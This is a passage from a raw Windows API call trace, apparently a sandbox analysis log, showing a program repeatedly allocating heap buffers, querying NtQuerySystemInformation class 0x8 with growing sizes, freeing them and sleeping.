0xc0000004 [0247.675] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0247.675] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0247.675] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.676] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0247.676] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.676] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.676] Sleep (dwMilliseconds=0x110) [0247.689] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0247.689] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.690] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0247.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0247.690] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.690] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0247.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0247.690] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.691] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0247.691] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0247.691] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.691] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0247.691] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.692] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.692] Sleep (dwMilliseconds=0x110) [0247.700] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0247.700] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.701] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0247.705] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0247.705] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.706] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0247.706] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0247.706] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.706] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0247.706] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0247.706] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.707] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0247.707] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.707] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.707] Sleep (dwMilliseconds=0x110) [0247.720] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0247.720] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.721] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0247.721] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0247.721] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.722] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0247.722] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0247.722] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.722] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0247.722] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0247.722] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.723] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0247.723] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.723] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.723] Sleep (dwMilliseconds=0x110) [0247.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0247.737] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.738] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0247.738] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0247.738] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.739] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0247.739] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0247.739] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.739] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0247.739] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0247.739] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.740] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0247.740] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.740] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.740] Sleep (dwMilliseconds=0x110) [0247.750] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0247.751] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0247.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0247.752] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0247.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0247.753] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.754] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0247.754] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0247.754] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.755] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0247.755] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.756] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.756] Sleep (dwMilliseconds=0x110) [0247.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0247.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0247.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0247.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0247.769] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0247.769] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0247.769] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0247.769] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.770] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0247.770] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.770] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.771] Sleep (dwMilliseconds=0x110) [0247.780] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0247.780] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.780] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0247.780] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0247.780] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.781] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0247.781] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0247.781] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.782] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0247.782] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0247.782] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.782] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0247.782] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.783] Sleep (dwMilliseconds=0x110) [0247.804] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0247.804] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.805] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0247.805] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0247.805] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.806] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0247.806] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0247.806] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.807] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0247.807] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0247.807] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.808] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0247.808] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.809] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.811] Sleep (dwMilliseconds=0x110) [0247.843] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0247.843] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.844] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0247.844] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0247.844] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0247.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0247.845] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0247.846] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0247.846] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0247.852] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.852] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.853] Sleep (dwMilliseconds=0x110) [0247.856] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0247.856] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.857] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0247.857] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0247.857] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.857] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0247.858] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0247.858] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.858] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0247.858] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0247.858] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.859] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0247.859] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.859] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.859] Sleep (dwMilliseconds=0x110) [0247.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0247.876] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.876] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0247.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0247.876] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0247.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0247.877] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0247.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0247.877] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0247.878] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.878] Sleep (dwMilliseconds=0x110) [0247.888] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0247.888] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.889] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0247.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0247.889] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.890] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0247.890] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0247.890] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.890] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0247.890] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0247.890] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0247.891] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.892] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.892] Sleep (dwMilliseconds=0x110) [0247.907] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0247.907] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.908] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0247.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0247.908] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.908] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0247.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0247.908] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0247.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0247.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0247.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.910] Sleep (dwMilliseconds=0x110) [0247.920] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0247.920] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.920] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0247.920] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0247.920] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.921] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0247.921] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 